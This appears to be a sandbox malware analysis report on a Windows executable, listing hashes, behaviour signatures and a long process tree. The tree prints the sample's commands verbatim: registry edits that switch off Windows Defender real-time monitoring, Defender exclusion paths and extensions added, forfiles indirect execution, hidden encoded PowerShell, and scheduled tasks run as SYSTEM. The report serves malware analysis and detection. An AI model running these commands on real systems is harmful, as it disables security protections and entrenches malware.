Analysis

  • max time kernel
    226s
  • max time network
    232s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09/09/2024, 05:05

General

  • Target

    7f5414c1816252869825077cd0d42857a70af578564ab540b1ab24347453c785.exe

  • Size

    7.3MB

  • MD5

    0aa50476f7e57e93a398f91bc0afcacb

  • SHA1

    9b5fe67017ae44c5d8c05707417ee93edffeebe3

  • SHA256

    7f5414c1816252869825077cd0d42857a70af578564ab540b1ab24347453c785

  • SHA512

    b6f52105a8f092dc140d1f0baf2bd66d43d037e7799dcfb4071502e66388d4db59c48e7ae6df775e561ce741b28914fd2b7e9ca5fd82a1bd4547e4a1745aa599

  • SSDEEP

    196608:91OZyiqsUYRGSfFYV5VrclTAbiJE9/MjSepybM+v:3OZyiRrRG3V5AJqbZ

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7f5414c1816252869825077cd0d42857a70af578564ab540b1ab24347453c785.exe
    "C:\Users\Admin\AppData\Local\Temp\7f5414c1816252869825077cd0d42857a70af578564ab540b1ab24347453c785.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Users\Admin\AppData\Local\Temp\7zSC14C.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Users\Admin\AppData\Local\Temp\7zSC3BC.tmp\Install.exe
        .\Install.exe /zqDdidra "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2304
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2216
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1628
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2316
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:1648
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2476
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2736
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2724
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2752
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2804
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                    PID:2816
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                PID:2864
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                    PID:2860
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      7⤵
                        PID:2800
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    5⤵
                    • Indirect Command Execution
                    PID:2868
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                        PID:2956
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2836
                          • C:\Windows\SysWOW64\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2596
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    4⤵
                    • Indirect Command Execution
                    PID:1820
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                        PID:1936
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1300
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            7⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1392
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bfZLKvswclkylKDSwV" /SC once /ST 05:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\gJkGBQIgGefEZMTgu\hpTVRgnUUJbYCsc\yiSZqIJ.exe\" 1H /pdidCGZh 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Scheduled Task/Job: Scheduled Task
                      PID:1764
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 640
                      4⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:2716
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {8E3B6D8A-43C8-4E6F-9C63-E6C30A5D45CD} S-1-5-18:NT AUTHORITY\System:Service:
                1⤵
                  PID:2820
                  • C:\Users\Admin\AppData\Local\Temp\gJkGBQIgGefEZMTgu\hpTVRgnUUJbYCsc\yiSZqIJ.exe
                    C:\Users\Admin\AppData\Local\Temp\gJkGBQIgGefEZMTgu\hpTVRgnUUJbYCsc\yiSZqIJ.exe 1H /pdidCGZh 525403 /S
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:2920
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2488
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        PID:1944
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:3028
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            6⤵
                              PID:3060
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                          4⤵
                          • Indirect Command Execution
                          PID:1028
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            5⤵
                              PID:2080
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                6⤵
                                  PID:1240
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                              4⤵
                              • Indirect Command Execution
                              PID:912
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:608
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  6⤵
                                    PID:1132
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                4⤵
                                • Indirect Command Execution
                                PID:2912
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1716
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                    6⤵
                                      PID:2784
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                  4⤵
                                  • Indirect Command Execution
                                  PID:2780
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    5⤵
                                      PID:2008
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                        6⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1280
                                        • C:\Windows\SysWOW64\gpupdate.exe
                                          "C:\Windows\system32\gpupdate.exe" /force
                                          7⤵
                                            PID:2396
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "gQjOgOIZp" /SC once /ST 03:25:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                    3⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1696
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /run /I /tn "gQjOgOIZp"
                                    3⤵
                                      PID:1380
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gQjOgOIZp"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2104
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2364
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                        4⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:1648
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2316
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        4⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:2740
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "gdwwJWvXW" /SC once /ST 02:15:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2816
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn "gdwwJWvXW"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2800
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gdwwJWvXW"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2888
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                      3⤵
                                      • Indirect Command Execution
                                      PID:1584
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        4⤵
                                          PID:1980
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1764
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2628
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1796
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2952
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                          PID:2928
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            PID:2756
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:32
                                          3⤵
                                            PID:2032
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:1656
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:760
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:1844
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C copy nul "C:\Windows\Temp\zeoxHVLKMRnVtqWd\MZAyUiia\qKDDodxNtDjGLntE.wsf"
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2584
                                              • C:\Windows\SysWOW64\wscript.exe
                                                wscript "C:\Windows\Temp\zeoxHVLKMRnVtqWd\MZAyUiia\qKDDodxNtDjGLntE.wsf"
                                                3⤵
                                                • Modifies data under HKEY_USERS
                                                PID:3056
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCLnCZtZU" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2080
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCLnCZtZU" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:444
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EonWkApmMnZKC" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2784
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EonWkApmMnZKC" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1652
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsbTokjwukMU2" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:484
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsbTokjwukMU2" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2692
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmBXJAkJjyTHqSsNouR" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2480
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmBXJAkJjyTHqSsNouR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1724
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lUHuQFRWyPUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:468
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lUHuQFRWyPUn" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:796
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xHjYKRHoNYMxhuVB" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2276
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xHjYKRHoNYMxhuVB" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:696
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:860
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1708
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\gJkGBQIgGefEZMTgu" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2244
                                                • C:\Windows\SysWOW64\reg.exe
